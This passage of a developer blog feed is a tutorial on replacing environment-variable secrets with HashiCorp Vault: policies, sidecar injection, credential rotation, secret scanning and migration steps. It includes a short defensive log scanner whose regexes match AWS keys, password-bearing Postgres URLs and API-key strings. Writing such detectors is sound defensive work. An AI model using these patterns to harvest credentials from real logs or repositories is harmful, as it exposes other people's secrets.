&lt;p&gt;Each service gets its own Vault policy with least-privilege access. The API service can read API secrets and shared database credentials. It cannot read billing secrets. This is impossible with env vars — there's no access control.&lt;/p&gt;
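
&lt;p&gt;The default-deny semantics of that policy can be sketched in a few lines. &lt;code&gt;fnmatch&lt;/code&gt; here is only an approximation of Vault's path-glob matching, but it captures the shape of the access check:&lt;/p&gt;

```python
from fnmatch import fnmatch

# Mirrors the Vault policy above: explicit grants, default deny
API_SERVICE_POLICY = {
    "secret/data/api/*": "read",
    "secret/data/shared/database": "read",
    "secret/data/billing/*": "deny",
}

def capability(path, policy=API_SERVICE_POLICY):
    # First matching rule wins; anything unmatched is denied
    for pattern, cap in policy.items():
        if fnmatch(path, pattern):
            return cap
    return "deny"

print(capability("secret/data/api/stripe"))         # read
print(capability("secret/data/billing/customers"))  # deny
print(capability("secret/data/other/thing"))        # deny (no rule at all)
```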

&lt;p&gt;For teams not ready for Vault's operational overhead:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AWS:&lt;/strong&gt; Use Secrets Manager + IAM roles (not env vars, not Parameter Store for secrets)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GCP:&lt;/strong&gt; Use Secret Manager + Workload Identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Azure:&lt;/strong&gt; Use Key Vault + Managed Identities&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Layer 2: Vault Agent Sidecar (Dynamic Injection)
&lt;/h3&gt;

&lt;p&gt;Instead of injecting secrets at container startup, Vault Agent runs as a sidecar and writes secrets to a tmpfs volume that only the application can read:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# docker-compose.yml&lt;/span&gt;
&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;api&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;registry.local/api:latest&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;secrets-vol:/run/secrets:ro&lt;/span&gt;
    &lt;span class="na"&gt;depends_on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;vault-agent&lt;/span&gt;

  &lt;span class="na"&gt;vault-agent&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hashicorp/vault:latest&lt;/span&gt;
    &lt;span class="na"&gt;command&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;vault agent -config=/etc/vault-agent.hcl&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;secrets-vol:/run/secrets&lt;/span&gt;

&lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;secrets-vol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;driver&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;local&lt;/span&gt;
    &lt;span class="na"&gt;driver_opts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tmpfs&lt;/span&gt;
      &lt;span class="na"&gt;device&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tmpfs&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The application reads secrets from &lt;code&gt;/run/secrets/database.json&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;pathlib&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Path&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_db_url&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;secret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;loads&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;Path&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/run/secrets/database.json&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nf"&gt;read_text&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;postgres://&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;secret&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;username&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;:&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;secret&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;password&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;@&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;secret&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;host&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;:&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;secret&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;port&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;/&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;secret&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dbname&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why tmpfs?&lt;/strong&gt; Secrets live only in memory. They're never written to disk. Container restart = secrets re-fetched from Vault. If the container is compromised, the attacker gets the current secret — but they can't persist it across restarts, and Vault's audit log shows the access.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 3: Automatic Rotation
&lt;/h3&gt;

&lt;p&gt;Static secrets are a liability. We rotate database credentials every 24 hours using Vault's database secrets engine:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Vault database secrets engine config&lt;/span&gt;
&lt;span class="nx"&gt;resource&lt;/span&gt; &lt;span class="s2"&gt;"vault_database_secret_backend_role"&lt;/span&gt; &lt;span class="s2"&gt;"api_db"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;name&lt;/span&gt;    &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"api-readonly"&lt;/span&gt;
  &lt;span class="nx"&gt;backend&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"database"&lt;/span&gt;

  &lt;span class="nx"&gt;creation_statements&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="s2"&gt;"CREATE ROLE &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;{{name}}&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt; WITH LOGIN PASSWORD '{{password}}' VALID UNTIL '{{expiration}}';"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="s2"&gt;"GRANT SELECT ON ALL TABLES IN SCHEMA public TO &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;{{name}}&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;;"&lt;/span&gt;
  &lt;span class="p"&gt;]&lt;/span&gt;

  &lt;span class="nx"&gt;default_ttl&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"24h"&lt;/span&gt;
  &lt;span class="nx"&gt;max_ttl&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"48h"&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The Vault Agent sidecar detects when credentials are about to expire and fetches new ones. The application picks up the new credentials without restarting — we use a file watcher that reloads the database connection pool:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;watchdog.observers&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Observer&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;watchdog.events&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;FileModifiedEvent&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SecretReloader&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;on_modified&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;src_path&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/run/secrets/database.json&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;reconnect_database&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;24-hour rotation means even if a credential leaks, it's useless within 24 hours. Compare this to env vars, where the same &lt;code&gt;DATABASE_URL&lt;/code&gt; might live unchanged for months.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer 4: Secret Scanning (Defense in Depth)
&lt;/h3&gt;

&lt;p&gt;Despite all the above, secrets still leak. A developer hardcodes a test credential. An error message includes a connection string. A log line captures more than intended.&lt;/p&gt;

&lt;p&gt;We run detection at three levels:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Pre-commit:&lt;/strong&gt; trufflehog scans staged changes before each commit lands&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CI:&lt;/strong&gt; gitleaks runs on every PR &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime:&lt;/strong&gt; a log scanner watches Loki for patterns matching credentials
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# .pre-commit-config.yaml&lt;/span&gt;
&lt;span class="na"&gt;repos&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;repo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://github.com/trufflesecurity/trufflehog&lt;/span&gt;
    &lt;span class="na"&gt;rev&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v3.63.0&lt;/span&gt;
    &lt;span class="na"&gt;hooks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;trufflehog&lt;/span&gt;
        &lt;span class="na"&gt;entry&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;trufflehog git file://. --only-verified --fail&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The runtime scanner is the last line of defense — and it's the one that caught our incident in 11 seconds.&lt;/p&gt;
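&lt;p&gt;The scanner itself doesn't need to be sophisticated. A hedged sketch of the idea (the patterns and the &lt;code&gt;scan_line&lt;/code&gt; helper are illustrative, not our production ruleset):&lt;/p&gt;

```python
import re

# Illustrative patterns; real deployments use broader, vendor-specific rules.
CREDENTIAL_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                       # AWS access key ID
    re.compile(r"postgres://[^:\s]+:[^@\s]+@"),            # conn string with password
    re.compile(r"(?i)(api[_-]?key|secret)\s*[:=]\s*\S+"),  # key=value style leaks
]

def scan_line(line):
    """Return True if a log line appears to contain a credential."""
    return any(p.search(line) for p in CREDENTIAL_PATTERNS)
```

&lt;p&gt;Point something like this at a Loki tail and alert on any match; false positives are cheap compared to a missed leak.&lt;/p&gt;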

&lt;h2&gt;
  
  
  Migration Path: Env Vars to Vault in 4 Steps
&lt;/h2&gt;

&lt;p&gt;You don't have to migrate everything at once.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Week 1:&lt;/strong&gt; Install Vault (single-node is fine to start). Migrate your 3 most sensitive secrets: database credentials, cloud provider keys, payment provider tokens.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Week 2:&lt;/strong&gt; Set up Vault Agent sidecars for production services. Keep env vars as fallback — the application checks &lt;code&gt;/run/secrets/&lt;/code&gt; first, falls back to &lt;code&gt;os.environ&lt;/code&gt;.&lt;/p&gt;
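&lt;p&gt;The fallback logic is deliberately boring. A sketch of the lookup order, assuming the secret is rendered as JSON to &lt;code&gt;/run/secrets/database.json&lt;/code&gt;:&lt;/p&gt;

```python
import json
import os
from pathlib import Path

def get_database_url(secret_file="/run/secrets/database.json"):
    """Prefer the Vault-rendered file; fall back to the legacy env var.

    During the migration window, services with a Vault Agent sidecar use
    it automatically, and everything else keeps working on env vars.
    """
    path = Path(secret_file)
    if path.exists():
        s = json.loads(path.read_text())
        return "postgres://{username}:{password}@{host}:{port}/{dbname}".format(**s)
    return os.environ["DATABASE_URL"]
```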

&lt;p&gt;&lt;strong&gt;Week 3:&lt;/strong&gt; Enable dynamic database credentials. This is the biggest security win — every service gets unique, short-lived credentials.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Week 4:&lt;/strong&gt; Remove env var fallback. Enable secret scanning in CI. Celebrate.&lt;/p&gt;

&lt;p&gt;For teams in Latin America, where the nearshoring boom means rapid team scaling, this migration path is especially important. Frequent onboarding means more opportunities for accidental credential exposure, and Vault's audit log gives you visibility that env vars never will.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cost: Less Than You Think
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Vault OSS:&lt;/strong&gt; Free. Runs on a single VM.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HCP Vault (HashiCorp-managed):&lt;/strong&gt; from roughly $0.03/hour; self-managed Vault Enterprise is custom-priced&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS Secrets Manager:&lt;/strong&gt; $0.40/secret/month + $0.05 per 10K API calls&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Our setup (Vault OSS + 1 VM):&lt;/strong&gt; ~$20/month total&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Compare that to the cost of a single credential breach. IBM's 2024 Cost of a Data Breach report puts the global average at $4.88M. Even for a startup, a leaked AWS key can generate a $50K bill in hours from cryptomining.&lt;/p&gt;

&lt;p&gt;$20/month for secret management vs $50K+ for a breach. The math works.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Mistakes During Migration
&lt;/h2&gt;

&lt;p&gt;Teams migrating from env vars to Vault make predictable mistakes. Here are the ones we see most often.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 1: Big-bang migration.&lt;/strong&gt; Trying to move all 50 secrets to Vault in one weekend. Something breaks, nobody can debug it because nobody knows Vault yet, and the team rolls back to env vars forever. Use the 4-week phased approach above. Start with 3 secrets. Build muscle memory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 2: Vault as a single point of failure.&lt;/strong&gt; Vault OSS runs as a single node by default. If it goes down, no service can fetch secrets. Solution: either run Vault in HA mode (3 nodes minimum) or implement a local cache. Vault Agent caches secrets locally — if the Vault server is temporarily unreachable, services continue using cached credentials until they expire.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# vault-agent cache configuration&lt;/span&gt;
&lt;span class="nx"&gt;cache&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;use_auto_auth_token&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="nx"&gt;listener&lt;/span&gt; &lt;span class="s2"&gt;"tcp"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;address&lt;/span&gt;     &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"127.0.0.1:8200"&lt;/span&gt;
  &lt;span class="nx"&gt;tls_disable&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Mistake 3: Not testing secret rotation under load.&lt;/strong&gt; Rotation works perfectly in staging. In production, when 40 services simultaneously try to reconnect with new credentials, your database connection pool explodes. Test rotation during peak load, not during a quiet maintenance window. We discovered this the hard way at 2pm on a Tuesday.&lt;/p&gt;
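&lt;p&gt;The standard mitigation is jitter: don't let every service reconnect at the same instant. A minimal sketch (the &lt;code&gt;reconnect&lt;/code&gt; callback and the window size are placeholders):&lt;/p&gt;

```python
import random
import time

def staggered_reconnect(reconnect, max_jitter_s=30.0):
    """Sleep a random delay before reconnecting with new credentials.

    Spreading reloads across a 0..max_jitter_s window keeps the database
    from absorbing every service's new connections in the same second.
    """
    delay = random.uniform(0.0, max_jitter_s)
    time.sleep(delay)
    reconnect()
    return delay
```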

&lt;p&gt;&lt;strong&gt;Mistake 4: Forgetting CI/CD pipelines.&lt;/strong&gt; Your application services now use Vault, but your &lt;a href="https://www.techsaas.cloud/blog/cicd-pipeline-optimization-20min-to-3min" rel="noopener noreferrer"&gt;CI/CD pipeline&lt;/a&gt; still has secrets in GitHub Actions secrets or environment variables. CI secrets are a common blind spot — and they're especially dangerous because CI logs are often more widely accessible than production logs. Use Vault's AppRole auth or GitHub's OIDC integration to fetch CI secrets dynamically.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mistake 5: Not securing the Vault unsealing process.&lt;/strong&gt; Vault starts sealed. Someone needs to unseal it after every restart. If you store unseal keys in a &lt;code&gt;.txt&lt;/code&gt; file on the same server (we've seen this), you've replaced one insecure pattern with another. Use auto-unseal with a cloud KMS (AWS KMS, GCP Cloud KMS) or Shamir's Secret Sharing with keys distributed to 3+ team members.&lt;/p&gt;

&lt;h2&gt;
  
  
  Secrets in Multi-Cloud Environments
&lt;/h2&gt;

&lt;p&gt;If you're running services across multiple cloud providers — a pattern we analyze in our &lt;a href="https://www.techsaas.cloud/blog/multi-cloud-hidden-costs-pitfalls" rel="noopener noreferrer"&gt;multi-cloud pitfalls guide&lt;/a&gt; — secret management gets significantly harder.&lt;/p&gt;

&lt;p&gt;Each cloud has its own secrets service with its own API, access control model, and rotation mechanism. Running Vault as a unified secrets layer across all clouds is one of the few genuinely good reasons to add a cloud-agnostic tool to your stack.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[AWS services] → Vault (central) ← [GCP services]
                    ↑
              [Azure services]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Vault authenticates each cloud's services using their native identity mechanisms (AWS IAM roles, GCP service accounts, Azure Managed Identities) and provides a single API for secret retrieval regardless of where the service runs.&lt;/p&gt;
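&lt;p&gt;From the application's perspective, the per-cloud differences collapse into the login payload. A hedged sketch against Vault's HTTP login API (the Vault address is a placeholder; each cloud's payload carries its native identity proof):&lt;/p&gt;

```python
import json
import urllib.request

VAULT_ADDR = "https://vault.internal:8200"  # placeholder address

def login_url(mount, vault_addr=VAULT_ADDR):
    """Each cloud authenticates at its own auth mount: 'aws', 'gcp', or 'azure'."""
    return f"{vault_addr}/v1/auth/{mount}/login"

def vault_login(mount, payload):
    """POST the cloud's signed identity proof; return a Vault client token.

    Payload examples: an AWS-signed STS request, a GCP service account JWT,
    or an Azure Managed Identity token. The flow is identical for all three.
    """
    req = urllib.request.Request(
        login_url(mount),
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=5) as resp:
        return json.load(resp)["auth"]["client_token"]
```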

&lt;p&gt;This is one of the cases where the &lt;a href="https://www.techsaas.cloud/blog/build-vs-buy-framework-engineering-leaders" rel="noopener noreferrer"&gt;build vs buy framework&lt;/a&gt; clearly points to "buy" (or rather, "adopt open-source"): building a cross-cloud secrets layer is never core to your product, and the mature solution already exists.&lt;/p&gt;

&lt;h2&gt;
  
  
  Frequently Asked Questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Q: Can't I just encrypt my &lt;code&gt;.env&lt;/code&gt; files and call it secure?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Encrypted &lt;code&gt;.env&lt;/code&gt; files are better than plaintext, but they still have fundamental problems: the decrypted values end up in memory as environment variables (back to square one), there's no access control (any process can read them), and there's no audit trail. It's a band-aid, not a solution.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Q: What about Docker secrets (docker secret create)?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Docker Swarm secrets are better than env vars — they're stored encrypted and mounted as files. But they're limited to Docker Swarm orchestration, they don't rotate automatically, and there's no access control granularity. If you're already on Swarm and not ready for Vault, they're a reasonable intermediate step. For Kubernetes, the native Secrets resource is base64-encoded (not encrypted at rest by default) — use the Vault CSI provider or sealed-secrets instead.&lt;/p&gt;
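&lt;p&gt;"Base64-encoded" deserves emphasis, because it is sometimes mistaken for encryption. Decoding takes one function call:&lt;/p&gt;

```python
import base64

def reveal(value):
    """Base64 is an encoding, not encryption: anyone who can read a
    Kubernetes Secret manifest can recover the plaintext."""
    return base64.b64decode(value).decode()

# reveal("c3VwZXJzZWNyZXQ=") returns "supersecret"
```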

&lt;p&gt;&lt;strong&gt;Q: We're a 3-person startup. Is Vault overkill?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;For a 3-person team, yes — Vault's operational overhead isn't justified yet. Use your cloud provider's native secrets service (AWS Secrets Manager, GCP Secret Manager) with IAM-based access control. It's $0.40/secret/month, zero operational overhead, and leagues better than env vars. Graduate to Vault when you cross 20+ services or need cross-cloud support.&lt;/p&gt;
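&lt;p&gt;The pricing is easy to sanity-check before committing. A back-of-envelope sketch using AWS Secrets Manager's published rates (adjust the constants for your provider):&lt;/p&gt;

```python
def secrets_manager_monthly_cost(num_secrets, api_calls,
                                 per_secret=0.40, per_10k_calls=0.05):
    """Estimate monthly cost: a flat fee per stored secret plus API-call fees."""
    return num_secrets * per_secret + (api_calls / 10_000) * per_10k_calls

# 20 secrets and 1M API calls/month stays in the low tens of dollars.
```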

&lt;h2&gt;
  
  
  Related Reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/cicd-pipeline-optimization-20min-to-3min" rel="noopener noreferrer"&gt;CI/CD Pipeline Optimization&lt;/a&gt; — securing secrets in fast CI pipelines&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/multi-cloud-hidden-costs-pitfalls" rel="noopener noreferrer"&gt;Multi-Cloud Strategy Pitfalls&lt;/a&gt; — why cross-cloud secret management is one of the hidden costs&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.techsaas.cloud/blog/self-hosted-llm-cost-comparison-production" rel="noopener noreferrer"&gt;Self-Hosted LLMs vs API&lt;/a&gt; — securing API keys and model credentials at scale&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;We help DevOps teams audit their secret management practices and migrate from env vars to production-grade solutions.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.techsaas.cloud/services/" rel="noopener noreferrer"&gt;Get a free security audit →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Subscribe to our newsletter for weekly deep-dives into production security practices.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Multi-Cloud Strategy Pitfalls Nobody Warns You About</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Tue, 28 Apr 2026 06:00:42 +0000</pubDate>
      <link>https://forem.com/yash_pritwani_07a77613fd6/multi-cloud-strategy-pitfalls-nobody-warns-you-about-51m9</link>
      <guid>https://forem.com/yash_pritwani_07a77613fd6/multi-cloud-strategy-pitfalls-nobody-warns-you-about-51m9</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/multi-cloud-hidden-costs-pitfalls" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  Multi-Cloud Strategy Pitfalls Nobody Warns You About
&lt;/h1&gt;

&lt;p&gt;&lt;em&gt;The hidden costs that make multi-cloud more expensive than single cloud — and what to do instead.&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Multi-Cloud Fantasy
&lt;/h2&gt;

&lt;p&gt;Every cloud strategy deck includes a slide that says "avoid vendor lock-in." The solution? Multi-cloud. Run workloads across AWS, GCP, and Azure. Stay portable. Keep leverage in vendor negotiations.&lt;/p&gt;

&lt;p&gt;It sounds rational. In practice, it's the most expensive decision most engineering organizations make — and they don't realize it until 18 months in, when the bill is 40% higher than single-cloud would have been.&lt;/p&gt;

&lt;p&gt;We've audited multi-cloud setups for companies ranging from 20-person startups to 500-person enterprises. The pattern is consistent: the costs that kill you aren't the ones in the architecture diagram.&lt;/p&gt;

&lt;h2&gt;
  
  
  The 5 Hidden Costs
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Egress Fees: The Silent Budget Killer
&lt;/h3&gt;

&lt;p&gt;Every cloud provider charges you to move data OUT. AWS charges $0.09/GB for data transferred out to the internet, and traffic to another cloud counts as exactly that. When your services span multiple clouds, every API call between them incurs egress fees.&lt;/p&gt;

